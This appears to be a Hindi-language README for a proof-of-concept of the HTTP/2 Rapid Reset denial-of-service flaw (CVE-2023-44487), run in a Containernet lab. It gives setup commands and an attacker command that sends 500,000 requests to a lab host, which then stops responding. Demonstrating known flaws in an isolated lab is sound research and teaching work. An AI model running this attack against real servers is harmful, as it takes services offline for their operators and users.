
HTTP/2 Rapid Reset DDoS भेद्यता के लिए PoC - CVE-2023-44487
यह परियोजना Containernet के साथ बनाई गई कस्टम नेटवर्क टोपोलॉजी का उपयोग करके HTTP/2 रैपिड रीसेट डिनायल-ऑफ-सर्विस (DoS) आक्रमण को प्रदर्शित करती है। यह आक्रमण HTTP/2 प्रोटोकॉल की कमजोरियों का फायदा उठाता है ताकि लक्षित सर्वर को अभिभूत कर उसे अनुत्तरदायी बना दिया जाए।

आवश्यक पैकेज स्थापित करने के लिए, निम्न कमांड चलाएँ:
./install.sh
डिफ़ॉल्ट स्थापना निर्देशिका बदलने के लिए, आप INSTALL_DIR वेरिएबल को इस प्रकार संशोधित कर सकते हैं:
INSTALL_DIR=/custom/path ./install.sh
इन्फ्रास्ट्रक्चर शुरू करने के लिए, निम्न कमांड चलाएँ:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
आक्रमण शुरू करने के लिए, अटैकर कंटेनर में निम्न कमांड निष्पादित करें:
./attacker -url='https://modern.art:443/api' -requests=500000
कुछ क्षणों के बाद, जब आप curl का उपयोग करके वेबसाइट तक पहुँचने का प्रयास करते हैं, तो यह अनुत्तरदायी हो जाती है।
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
इन्फ्रास्ट्रक्चर को रोकने के लिए, जिस टर्मिनल में topo.py चल रहा है, वहाँ केवल exit दर्ज करें।